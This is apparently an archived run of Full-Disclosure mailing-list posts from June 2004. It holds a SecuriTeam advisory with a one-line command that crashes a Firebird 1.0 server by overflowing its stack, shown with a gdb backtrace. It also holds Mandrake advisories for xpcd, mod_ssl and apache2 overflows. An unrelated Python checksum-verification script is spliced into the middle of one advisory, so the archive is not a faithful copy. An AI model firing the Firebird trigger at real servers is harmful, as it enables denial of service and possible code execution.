Firebird is "a relational database offering many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names since 1981".

A vulnerability in Firebird Database's way of handling database names allows an unauthenticated user to cause the server to crash, and overwrite critical sections of the stack used by the database.

DETAILS

Vulnerable Systems:
 * Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

Immune Systems:
 * Firebird Database version 1.5.0 (others are presumed to be immune as well)

By issuing:

gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever

On a remote server, you can see that:

gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...[Thread debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...[New Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()
(gdb) bt
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()
..

Solution:
Debian is currently not maintaining this version of the product, so it is recommended that you use a source code based installation.

ADDITIONAL INFORMATION

The information has been provided by Noam Rathaus.

Regards,
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

From lupe at lupe-christoph.de Tue Jun 1 22:13:32 2004
From: lupe at lupe-christoph.de (Lupe Christoph)
Date: Tue, 1 Jun 2004 23:13:32 +0200
Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability
In-Reply-To:
References:
Message-ID: <20040601211332.GB1538@lupe-christoph.de>

On Sunday, 2004-05-30 at 03:15:44 +0200, Roman Medina wrote:
> I also noticed that latest Debian stable distro ships a very old
> version of SquirrelMail, which is vulnerable to several old XSS bugs
> (in addition to the new one).

The latest Stable is itself quite old. Debian does not release very often. But security bugs are fixed when they become known. I have not found any bug report concerning XSS in the Debian bugs database.

Please be so kind as to file bugs if you are running Debian. If not, please mail the Debian Security Team as described in http://www.de.debian.org/security/faq#contact

Thank you,
Lupe Christoph
--
| lupe at lupe-christoph.de | http://www.lupe-christoph.de/ |
| "... putting a mail server on the Internet without filtering is like |
| covering yourself with barbecue sauce and breaking into the Charity |
| Home for Badgers with Rabies. Michael Lucas |

From security at linux-mandrake.com Tue Jun 1 22:57:52 2004
From: security at linux-mandrake.com (Mandrake Linux Security Team)
Date: 1 Jun 2004 21:57:52 -0000
Subject: [Full-Disclosure] MDKSA-2004:053 - Updated xpcd package fix vulnerabilities
Message-ID: <20040601215752.17503.qmail@updates.mandrakesoft.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandrakelinux Security Update Advisory
_______________________________________________________________________

Package name: xpcd
Advisory ID: MDKSA-2004:053
Date: June 1st, 2004
Affected versions: 10.0, 9.2
______________________________________________________________________

Problem Description:

A vulnerability in xpcd-svga, part of xpcd, was discovered by Jaguar. xpcd-svga uses svgalib to display graphics on the console and it would copy user-supplied data of an arbitrary length into a fixed-size buffer in the pcd_open function.

As well, Steve Kemp previously discovered a buffer overflow in xpcd-svga that could be triggered by a long HOME environment variable, which could be exploited by a local attacker to obtain root privileges.

The updated packages resolve these vulnerabilities.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0649 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0402 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: 95c59861d1efef825ab730cba2691365 10.0/RPMS/xpcd-2.08-20.1.100mdk.i586.rpm 3114811e46e3a4b82e053894f153643d 10.0/RPMS/xpcd-gimp-2.08-20.1.100mdk.i586.rpm b3df76a539187146894f18d67a2967fd 10.0/SRPMS/xpcd-2.08-20.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 50261e00a816e5621ce37d0f6320a941 amd64/10.0/RPMS/xpcd-2.08-20.1.100mdk.amd64.rpm 4362a1d3211af0c386aef08abfc74cc6 amd64/10.0/RPMS/xpcd-gimp-2.08-20.1.100mdk.amd64.rpm b3df76a539187146894f18d67a2967fd amd64/10.0/SRPMS/xpcd-2.08-20.1.100mdk.src.rpm Mandrakelinux 9.2: 907efca9e8de1fc9489755c919c51b8b 9.2/RPMS/xpcd-2.08-20.1.92mdk.i586.rpm 41078887e2d6bf60d376540653e997f7 9.2/RPMS/xpcd-gimp-2.08-20.1.92mdk.i586.rpm 9e2a2741fb7130324737a9262dbe8afb 9.2/SRPMS/xpcd-2.08-20.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 4f434cc67c282744664a14e285b24e9e amd64/9.2/RPMS/xpcd-2.08-20.1.92mdk.amd64.rpm 7b6d9c0dfe83763823cc007f0956b173 amd64/9.2/RPMS/xpcd-gimp-2.08-20.1.92mdk.amd64.rpm 9e2a2741fb7130324737a9262dbe8afb amd64/9.2/SRPMS/xpcd-2.08-20.1.92mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. 
You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAvPvgmqjQ0CJFipgRAo8iAJ45Y7VU+B4FPBUwtbpjNyq8WJPA7wCgoVf+ 8St+6Ck5Tqq1iRjZpa9L/x4= =iwPf -----END PGP SIGNATURE----- From security at linux-mandrake.com Tue Jun 1 23:01:32 2004 
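The Updated Packages list in each of these advisories pairs every file with an md5, and urpmi checks those plus the GPG signatures for you; if you fetch RPMs by hand from a mirror, the same check is easy to script. The following is an added example and not Mandrakesoft's tooling: it pulls the md5/path pairs out of the advisory text (tolerating the list being run together on one line, as it is on this page), compares them with files under a mirror directory, and decides from the file name whether an installed name-version-release is older than the fixed package, using a simplified rpmvercmp with no epoch or tilde handling. The sample list is the Mandrakelinux 10.0 block of the xpcd advisory above. The md5 only ties a downloaded file to this advisory text; the advisory's own PGP signature (key 0x22458A98, above) is what authenticates the list, so verify that first.

```python
import hashlib
import re

# One entry of the "Updated Packages" list: "<32 hex md5>  <relative path>.rpm".
PKG_RE = re.compile(r"\b([0-9a-f]{32})\s+(\S+?\.rpm)\b")
# RPM file name: name-version-release.arch.rpm (the release may contain dots, never dashes).
NVR_RE = re.compile(r"^(?P<name>.+)-(?P<ver>[^-]+)-(?P<rel>[^-]+)\.(?P<arch>[^.]+)\.rpm$")

# The Mandrakelinux 10.0 block of MDKSA-2004:053 as it appears above.
XPCD_10_0 = (
    "Mandrakelinux 10.0: 95c59861d1efef825ab730cba2691365 10.0/RPMS/xpcd-2.08-20.1.100mdk.i586.rpm "
    "3114811e46e3a4b82e053894f153643d 10.0/RPMS/xpcd-gimp-2.08-20.1.100mdk.i586.rpm "
    "b3df76a539187146894f18d67a2967fd 10.0/SRPMS/xpcd-2.08-20.1.100mdk.src.rpm"
)


def parse_advisory_packages(text):
    """Return {relative_path: md5} for every package the advisory lists,
    whether the list is one entry per line or flattened onto a single line."""
    return {path: md5 for md5, path in PKG_RE.findall(text)}


def verify_packages(expected, fetch):
    """Check each listed package against the bytes fetch(path) returns (None when absent).
    Result per path: 'ok', 'mismatch' (corrupt or tampered download) or 'missing'."""
    report = {}
    for path, md5 in expected.items():
        blob = fetch(path)
        if blob is None:
            report[path] = "missing"
        else:
            report[path] = "ok" if hashlib.md5(blob).hexdigest() == md5 else "mismatch"
    return report


def fetch_from_dir(root):
    """fetch() callback for a local mirror tree: reads <root>/<relative path>."""
    def fetch(path):
        try:
            with open(f"{root}/{path}", "rb") as f:
                return f.read()
        except FileNotFoundError:
            return None
    return fetch


def _segments(s):
    """rpm compares version strings as alternating digit runs and letter runs."""
    return re.findall(r"\d+|[A-Za-z]+", s)


def rpmvercmp(a, b):
    """Simplified rpmvercmp: -1 if a is older than b, 0 if equal, 1 if newer.
    Digit runs compare numerically (so 010 == 10), letter runs lexically, a digit
    run beats a letter run, and when one side runs out of segments the longer is newer."""
    sa, sb = _segments(a), _segments(b)
    for x, y in zip(sa, sb):
        if x == y:
            continue
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return (int(x) > int(y)) - (int(x) < int(y))
            continue
        if x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        return (x > y) - (x < y)
    return (len(sa) > len(sb)) - (len(sa) < len(sb))


def needs_update(installed_nvr, advisory_path):
    """True if the installed package (as 'rpm -q' prints it, e.g. 'xpcd-2.08-20mdk')
    is older than the package the advisory ships at advisory_path."""
    fixed = NVR_RE.match(advisory_path.rsplit("/", 1)[-1])
    inst = re.match(r"^(?P<name>.+)-(?P<ver>[^-]+)-(?P<rel>[^-]+)$", installed_nvr)
    if not fixed or not inst:
        raise ValueError("unparseable package name")
    if fixed["name"] != inst["name"]:
        raise ValueError(f"different packages: {inst['name']} vs {fixed['name']}")
    c = rpmvercmp(inst["ver"], fixed["ver"]) or rpmvercmp(inst["rel"], fixed["rel"])
    return c < 0


if __name__ == "__main__":
    for path, status in verify_packages(parse_advisory_packages(XPCD_10_0), fetch_from_dir("/var/mirror")).items():
        print(status, path)
```

Feed it the whole advisory and a mirror checkout and it reports every listed file as ok, mismatch or missing; a mismatch on a file you just downloaded is a reason to stop, not to retry. The version check is deliberately separate: 'rpm -q xpcd' gives you the installed name-version-release, and needs_update() tells you whether the advisory's package is newer without having to eyeball release strings like 20mdk versus 20.1.100mdk.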
From: security at linux-mandrake.com (Mandrake Linux Security Team)
Date: 1 Jun 2004 22:01:32 -0000
Subject: [Full-Disclosure] MDKSA-2004:054 - Updated mod_ssl package fix remote vulnerability
Message-ID: <20040601220132.18065.qmail@updates.mandrakesoft.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandrakelinux Security Update Advisory
_______________________________________________________________________

Package name: mod_ssl
Advisory ID: MDKSA-2004:054
Date: June 1st, 2004
Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2
______________________________________________________________________

Problem Description:

A stack-based buffer overflow exists in the ssl_util_uuencode_binary function in ssl_engine_kernel.c in mod_ssl for Apache 1.3.x. When mod_ssl is configured to trust the issuing CA, a remote attacker may be able to execute arbitrary code via a client certificate with a long subject DN.

The provided packages are patched to prevent this problem.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: e835aa3c42443822b1bb38202a242864 10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.i586.rpm 92c3494519927447e841b87e41c18030 10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 9443127cebae4776cba6a419faea6db9 amd64/10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.amd64.rpm 92c3494519927447e841b87e41c18030 amd64/10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Corporate Server 2.1: 02f0643ee2c77e343e982d45272d2736 corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.i586.rpm 9dcf45014753c32281f3ef9424bdb4d3 corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Corporate Server 2.1/x86_64: a9bb204c891b9f4e02d611ec5d26438b x86_64/corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.x86_64.rpm 9dcf45014753c32281f3ef9424bdb4d3 x86_64/corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Mandrakelinux 9.1: 5cb8b20c7d25a23c41797fa9cc1515ff 9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.i586.rpm f8222566b9d5dfb1a920a73f16142d4a 9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.1/PPC: 254ddacd51c9a8a82207c4a268c064f6 ppc/9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.ppc.rpm f8222566b9d5dfb1a920a73f16142d4a ppc/9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.2: 806e5234ca391db643339020e719bc0f 9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.i586.rpm 1bb3fbc11273a15fb681c8f94925154d 9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: d46068aa64c2aa3c106428d6bcf5e480 amd64/9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.amd64.rpm 1bb3fbc11273a15fb681c8f94925154d amd64/9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Multi Network Firewall 8.2: 9855760b94cdb77928ed1a480684bd7c mnf8.2/RPMS/mod_ssl-2.8.7-3.3.M82mdk.i586.rpm 4ad6b33008550170e737fdd9d69a72ed mnf8.2/SRPMS/mod_ssl-2.8.7-3.3.M82mdk.src.rpm _______________________________________________________________________ To 
upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security.

You can obtain the GPG public key of the Mandrakelinux Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandrakelinux at:

http://www.mandrakesoft.com/security/advisories

If you want to report vulnerabilities, please contact

security_linux-mandrake.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFAvPy8mqjQ0CJFipgRAmaEAJ0SeN4R050lOF3LuUcQTlmzCT8INACfaQ7n
qpVhOLhikQRBRFscxFo53A0=
=uv5H
-----END PGP SIGNATURE-----

From chris at sw.gotdns.org Tue Jun 1 23:09:31 2004
From: chris at sw.gotdns.org (Chris van der Pennen)
Date: Wed, 2 Jun 2004 07:39:31 +0930 (Cen. Australia Standard Time)
Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate?
Message-ID:

I've been getting SSL certificates from various websites recently that are apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign. The certificate expired 6 December 2002.

The data in Issued To and Issued By are identical.

This smells very much like an SSL hijack attempt - can anyone shed some light on the situation?

Chris

From security at linux-mandrake.com Tue Jun 1 23:12:33 2004
From: security at linux-mandrake.com (Mandrake Linux Security Team)
Date: 1 Jun 2004 22:12:33 -0000
Subject: [Full-Disclosure] MDKSA-2004:055 - Updated apache2 package fix vulnerability in mod_ssl
Message-ID: <20040601221233.18774.qmail@updates.mandrakesoft.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandrakelinux Security Update Advisory
_______________________________________________________________________

Package name: apache2
Advisory ID: MDKSA-2004:055
Date: June 1st, 2004
Affected versions: 10.0, 9.1, 9.2
______________________________________________________________________

Problem Description:

A stack-based buffer overflow exists in the ssl_util_uuencode_binary function in ssl_util.c in Apache. When mod_ssl is configured to trust the issuing CA, a remote attacker may be able to execute arbitrary code via a client certificate with a long subject DN.

The provided packages are patched to prevent this problem.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: 3111b612aa249513d3bfd62d660d84f5 10.0/RPMS/apache2-2.0.48-6.2.100mdk.i586.rpm be7f4c6d9976385c6884762a67521a20 10.0/RPMS/apache2-common-2.0.48-6.2.100mdk.i586.rpm 510706a2c99f5f7cc5f3e77bdb5da5aa 10.0/RPMS/apache2-devel-2.0.48-6.2.100mdk.i586.rpm f227a7c85de5ab4ccdc0b23afb6c7592 10.0/RPMS/apache2-manual-2.0.48-6.2.100mdk.i586.rpm 0f39dd91febd2c23330e9d1c493891b6 10.0/RPMS/apache2-mod_cache-2.0.48-6.2.100mdk.i586.rpm df6e1335b214e94f0c674851ff3212cf 10.0/RPMS/apache2-mod_dav-2.0.48-6.2.100mdk.i586.rpm b1c6a7416444501b8060bbdf8ca48f0a 10.0/RPMS/apache2-mod_deflate-2.0.48-6.2.100mdk.i586.rpm b6280f32c97c63b5088012838bc89cba 10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.2.100mdk.i586.rpm 5c170c8430f68fb4a4afed4434b1e513 10.0/RPMS/apache2-mod_file_cache-2.0.48-6.2.100mdk.i586.rpm 23bc5e376539bcee81b457f730efd7fd 10.0/RPMS/apache2-mod_ldap-2.0.48-6.2.100mdk.i586.rpm 9ce5229a7cc6ab93d85ec012ce696494 10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.2.100mdk.i586.rpm 0c86183703f69db7cdb28de391d3f78e 10.0/RPMS/apache2-mod_proxy-2.0.48-6.2.100mdk.i586.rpm b87416a718964d75904e529e52106063 10.0/RPMS/apache2-mod_ssl-2.0.48-6.2.100mdk.i586.rpm 432f0f4ae5e38e9b43b8364f324763dc 10.0/RPMS/apache2-modules-2.0.48-6.2.100mdk.i586.rpm 0427b1a08aabbd081cfca08af6071588 10.0/RPMS/apache2-source-2.0.48-6.2.100mdk.i586.rpm f9ab0637af7ce7159d5252976ddd27e1 10.0/RPMS/libapr0-2.0.48-6.2.100mdk.i586.rpm c2af0f267d9b0a31539c7c5e7fbdb4d9 10.0/SRPMS/apache2-2.0.48-6.2.100mdk.src.rpm Mandrakelinux 10.0/AMD64: b5434064b5ba9aa3295275029dd355f7 amd64/10.0/RPMS/apache2-2.0.48-6.2.100mdk.amd64.rpm 3e24450b95d3800cb2b53cbfe4247ed2 amd64/10.0/RPMS/apache2-common-2.0.48-6.2.100mdk.amd64.rpm 1513d147a1cd7e7d39b3544cef4452d8 
amd64/10.0/RPMS/apache2-devel-2.0.48-6.2.100mdk.amd64.rpm 337ff1d5f687d7ea370d66244f1f773d amd64/10.0/RPMS/apache2-manual-2.0.48-6.2.100mdk.amd64.rpm 77a114c6f9a8719e1a1c190efef8744c amd64/10.0/RPMS/apache2-mod_cache-2.0.48-6.2.100mdk.amd64.rpm 0f4e28c95bf98b580974cef192aed867 amd64/10.0/RPMS/apache2-mod_dav-2.0.48-6.2.100mdk.amd64.rpm 25a8a1b55d27e905eaf152a4ac264dbd amd64/10.0/RPMS/apache2-mod_deflate-2.0.48-6.2.100mdk.amd64.rpm 4c5dc9c54eb70194a3060a2365d6b4e8 amd64/10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.2.100mdk.amd64.rpm d72b2779cd56ac23897071f6d8c62384 amd64/10.0/RPMS/apache2-mod_file_cache-2.0.48-6.2.100mdk.amd64.rpm 752d4bca2e9fd6815745ce2265250c67 amd64/10.0/RPMS/apache2-mod_ldap-2.0.48-6.2.100mdk.amd64.rpm d414e1317b44b367d42937dd476e8484 amd64/10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.2.100mdk.amd64.rpm 0c33ae8b773b13eb528aa1e1769e36fa amd64/10.0/RPMS/apache2-mod_proxy-2.0.48-6.2.100mdk.amd64.rpm fd54f99ef0c42360e09799cf881cd37b amd64/10.0/RPMS/apache2-mod_ssl-2.0.48-6.2.100mdk.amd64.rpm c2361c2527ebbeafef57034173d2840b amd64/10.0/RPMS/apache2-modules-2.0.48-6.2.100mdk.amd64.rpm f799b8ddd90bca399459acd04b7010e0 amd64/10.0/RPMS/apache2-source-2.0.48-6.2.100mdk.amd64.rpm e60ee45d646fb0a6bc6c20f18b7c30d3 amd64/10.0/RPMS/lib64apr0-2.0.48-6.2.100mdk.amd64.rpm c2af0f267d9b0a31539c7c5e7fbdb4d9 amd64/10.0/SRPMS/apache2-2.0.48-6.2.100mdk.src.rpm Mandrakelinux 9.1: a11cbb72043587a99412d7052dcba791 9.1/RPMS/apache2-2.0.47-1.8.91mdk.i586.rpm bbc02417b82fa4bc6b2b7a74a204c7c2 9.1/RPMS/apache2-common-2.0.47-1.8.91mdk.i586.rpm 4cf89cb891b0856ba8b162e67061ea1a 9.1/RPMS/apache2-devel-2.0.47-1.8.91mdk.i586.rpm a96bfe336f16891d1d20a5a13b56a36f 9.1/RPMS/apache2-manual-2.0.47-1.8.91mdk.i586.rpm fea9374b8a23495b08ef5adad4074d23 9.1/RPMS/apache2-mod_dav-2.0.47-1.8.91mdk.i586.rpm 88e51a6e2be5c81063e29c7429c63733 9.1/RPMS/apache2-mod_ldap-2.0.47-1.8.91mdk.i586.rpm d33b565415852146de64b950e2aeb178 9.1/RPMS/apache2-mod_ssl-2.0.47-1.8.91mdk.i586.rpm 
69a56bece8b91acfdc11e199dbe486c3 9.1/RPMS/apache2-modules-2.0.47-1.8.91mdk.i586.rpm a17ba2052134939a3e5947f595162033 9.1/RPMS/apache2-source-2.0.47-1.8.91mdk.i586.rpm 5d0d10fe9603e84a1d48910c31eb783e 9.1/RPMS/libapr0-2.0.47-1.8.91mdk.i586.rpm d3034e88376372e030e6933191fd2dc9 9.1/SRPMS/apache2-2.0.47-1.8.91mdk.src.rpm Mandrakelinux 9.1/PPC: cdbeb822dbb99fda215877ea3e62b2b7 ppc/9.1/RPMS/apache2-2.0.47-1.8.91mdk.ppc.rpm ea58b7fe2522668f5748d722e38536fb ppc/9.1/RPMS/apache2-common-2.0.47-1.8.91mdk.ppc.rpm 830e5778c4765b6d788e6edc0de9e06f ppc/9.1/RPMS/apache2-devel-2.0.47-1.8.91mdk.ppc.rpm ce43d8231c6e6e923871744fd72596f5 ppc/9.1/RPMS/apache2-manual-2.0.47-1.8.91mdk.ppc.rpm c88920e151a05c23dffe03998973e1a1 ppc/9.1/RPMS/apache2-mod_dav-2.0.47-1.8.91mdk.ppc.rpm f5b23a897dd1ee750496a7d852e634c5 ppc/9.1/RPMS/apache2-mod_ldap-2.0.47-1.8.91mdk.ppc.rpm 494663652f8644d56beace3df3c63f00 ppc/9.1/RPMS/apache2-mod_ssl-2.0.47-1.8.91mdk.ppc.rpm 3e02de6e503834d5982510d549117bcf ppc/9.1/RPMS/apache2-modules-2.0.47-1.8.91mdk.ppc.rpm cd2d7f0e97ae4bceb365332f868d986d ppc/9.1/RPMS/apache2-source-2.0.47-1.8.91mdk.ppc.rpm 7f1525deceba60b85382ec30b4bb8003 ppc/9.1/RPMS/libapr0-2.0.47-1.8.91mdk.ppc.rpm d3034e88376372e030e6933191fd2dc9 ppc/9.1/SRPMS/apache2-2.0.47-1.8.91mdk.src.rpm Mandrakelinux 9.2: b45203ab6443ad24bc2373a82a9d0234 9.2/RPMS/apache2-2.0.47-6.5.92mdk.i586.rpm f727f5ce2d9504484b6acf7589f6a981 9.2/RPMS/apache2-common-2.0.47-6.5.92mdk.i586.rpm eafda47abdec2ac8e5898fb37c604def 9.2/RPMS/apache2-devel-2.0.47-6.5.92mdk.i586.rpm 8842f5bab2a525868d7ded2c7737bf38 9.2/RPMS/apache2-manual-2.0.47-6.5.92mdk.i586.rpm e5eca4891a90df4777f83297fcb397d4 9.2/RPMS/apache2-mod_cache-2.0.47-6.5.92mdk.i586.rpm c234e089f0d35fbcd62360f8ce3fa6fb 9.2/RPMS/apache2-mod_dav-2.0.47-6.5.92mdk.i586.rpm 623397c51d7b7239d169a997e7a365c0 9.2/RPMS/apache2-mod_deflate-2.0.47-6.5.92mdk.i586.rpm 1a884f364a4155eb18698dc3a7fb92f3 9.2/RPMS/apache2-mod_disk_cache-2.0.47-6.5.92mdk.i586.rpm 5ee061ac770af13bfc11a600d4a65ea1 
9.2/RPMS/apache2-mod_file_cache-2.0.47-6.5.92mdk.i586.rpm 88d9923fe86c2aa9eb3a249776ff8976 9.2/RPMS/apache2-mod_ldap-2.0.47-6.5.92mdk.i586.rpm 179cbd3f6cb9b1e8d3536134e0e35354 9.2/RPMS/apache2-mod_mem_cache-2.0.47-6.5.92mdk.i586.rpm 9167804d711ee3a478cd7042a0aa523d 9.2/RPMS/apache2-mod_proxy-2.0.47-6.5.92mdk.i586.rpm 8ec772426dd2600b65021c5f60748c52 9.2/RPMS/apache2-mod_ssl-2.0.47-6.5.92mdk.i586.rpm dcc9dba2ecc0e8fa7e8fe9dae75b0959 9.2/RPMS/apache2-modules-2.0.47-6.5.92mdk.i586.rpm 0b949c30da2754ae3b88a803cb45517a 9.2/RPMS/apache2-source-2.0.47-6.5.92mdk.i586.rpm 0833bcad1698f811d18bbb12ce11dc3c 9.2/RPMS/libapr0-2.0.47-6.5.92mdk.i586.rpm 1afd7ce470710ac3ed8f7ae4e344ff92 9.2/SRPMS/apache2-2.0.47-6.5.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 6744490bc56e70abf362927c3755db17 amd64/9.2/RPMS/apache2-2.0.47-6.5.92mdk.amd64.rpm 35e7d6f05a478db830a165aa05382a17 amd64/9.2/RPMS/apache2-common-2.0.47-6.5.92mdk.amd64.rpm cfa01cdb3126e6a735ff69c936c1f9e5 amd64/9.2/RPMS/apache2-devel-2.0.47-6.5.92mdk.amd64.rpm 5e52e0ef523a8383cede0395c2c04430 amd64/9.2/RPMS/apache2-manual-2.0.47-6.5.92mdk.amd64.rpm db785af0a804319de566134b585abb36 amd64/9.2/RPMS/apache2-mod_cache-2.0.47-6.5.92mdk.amd64.rpm 0c1fe531569925cfd812d1340489ecc5 amd64/9.2/RPMS/apache2-mod_dav-2.0.47-6.5.92mdk.amd64.rpm f67dab1f37130bf6eb0ddfb65c4fdda9 amd64/9.2/RPMS/apache2-mod_deflate-2.0.47-6.5.92mdk.amd64.rpm ed8d8f03faff8ebbe3d88392fa94dcd4 amd64/9.2/RPMS/apache2-mod_disk_cache-2.0.47-6.5.92mdk.amd64.rpm e4ceff685c7aac3f156a05ecd91e73f4 amd64/9.2/RPMS/apache2-mod_file_cache-2.0.47-6.5.92mdk.amd64.rpm 0cedfd81e38b7af96a20a58d75afb4b6 amd64/9.2/RPMS/apache2-mod_ldap-2.0.47-6.5.92mdk.amd64.rpm ebee758fa628bcadd8a53cea587497a2 amd64/9.2/RPMS/apache2-mod_mem_cache-2.0.47-6.5.92mdk.amd64.rpm aa732eb8c3cd2d5f456e15cdcce6aa08 amd64/9.2/RPMS/apache2-mod_proxy-2.0.47-6.5.92mdk.amd64.rpm 41e4d2277f0196b9a6e5d259f9df39c4 amd64/9.2/RPMS/apache2-mod_ssl-2.0.47-6.5.92mdk.amd64.rpm 1014599e6cfb73e88cd8991cb8f78bfc 
amd64/9.2/RPMS/apache2-modules-2.0.47-6.5.92mdk.amd64.rpm f91bc1ce80d21e5b2830e7c1aead5178 amd64/9.2/RPMS/apache2-source-2.0.47-6.5.92mdk.amd64.rpm 6d6fed31d95ee6b23f6fce0abe9e645a amd64/9.2/RPMS/lib64apr0-2.0.47-6.5.92mdk.amd64.rpm 1afd7ce470710ac3ed8f7ae4e344ff92 amd64/9.2/SRPMS/apache2-2.0.47-6.5.92mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAvP9RmqjQ0CJFipgRAnLWAJ9XhMeD5o0GtecsyXY8IVVQGGT8XwCeP562 +x53j3ohHo6aZEMnXAy7sko= =EJEa -----END PGP SIGNATURE----- From roman at rs-labs.com Wed Jun 2 00:49:01 2004 
From: roman at rs-labs.com (Roman Medina)
Date: Wed, 02 Jun 2004 01:49:01 +0200
Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability
In-Reply-To: <20040601211332.GB1538@lupe-christoph.de>
References: <20040601211332.GB1538@lupe-christoph.de>
Message-ID: <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com>

On Tue, 1 Jun 2004 23:13:32 +0200, you wrote:

